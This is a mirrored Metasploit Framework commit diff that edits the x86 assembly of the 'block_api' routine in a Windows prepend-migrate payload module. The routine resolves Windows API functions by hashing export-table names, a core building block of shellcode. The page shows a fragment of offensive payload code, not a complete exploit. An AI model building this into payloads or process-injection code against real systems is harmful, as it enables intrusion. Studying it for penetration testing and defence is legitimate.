infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add block_api changes to prepend_migrate

bug/bundler_fix
James Lee 2014-02-05 15:32:59 -06:00
parent 14aa8ffd5c
commit b226ecf591
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
1 changed files with 13 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
lib/msf/core/payload/windows/prepend_migrate.rb
View File

@ -85,21 +85,24 @@ module Msf::Payload::Windows::PrependMigrate
ror edi, 13 ; Rotate right our hash value ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough loop loop_modname ; Loop untill we have read enough
; We now have the module hash computed ; We now have the module hash computed
push edx ; Save the current position in the module list for later push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later push edi ; Save the current module hash for later
; Proceed to iterate the export address table ; Proceed to iterate the export address table
mov edx, [edx+16] ; Get this modules base address mov edx, [edx+16] ; Get this modules base address
mov eax, [edx+60] ; Get PE header mov eax, [edx+60] ; Get PE header
add eax, edx ; Add the modules base address
mov eax, [eax+120] ; Get export tables RVA ; use ecx as our EAT pointer here so we can take advantage of jecxz.
test eax, eax ; Test if no export address table is present mov ecx, [eax+edx+120] ; Get the EAT from the PE header
jz get_next_mod1 ; If no EAT present, process the next module jecxz get_next_mod1 ; If no EAT present, process the next module
add eax, edx ; Add the modules base address add ecx, edx ; Add the modules base address
push eax ; Save the current modules EAT push ecx ; Save the current modules EAT
mov ecx, [eax+24] ; Get the number of function names mov ebx, [ecx+32] ; Get the rva of the function names
mov ebx, [eax+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address add ebx, edx ; Add the modules base address
mov ecx, [ecx+24] ; Get the number of function names
; now ecx returns to its regularly scheduled counter duties
; Computing the module hash + function hash ; Computing the module hash + function hash
get_next_func: ; get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
@ -118,6 +121,7 @@ module Msf::Payload::Windows::PrependMigrate
add edi, [ebp-8] ; Add the current module hash to the function hash add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
jnz get_next_func ; Go compute the next function hash if we have not found it jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one... ; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva mov ebx, [eax+36] ; Get the ordinal table rva
@ -138,6 +142,7 @@ module Msf::Payload::Windows::PrependMigrate
push ecx ; Push back the correct return value push ecx ; Push back the correct return value
jmp eax ; Jump into the required function jmp eax ; Jump into the required function
; We now automagically return to the correct caller... ; We now automagically return to the correct caller...
get_next_mod: ; get_next_mod: ;
pop eax ; Pop off the current (now the previous) modules EAT pop eax ; Pop off the current (now the previous) modules EAT
get_next_mod1: ; get_next_mod1: ;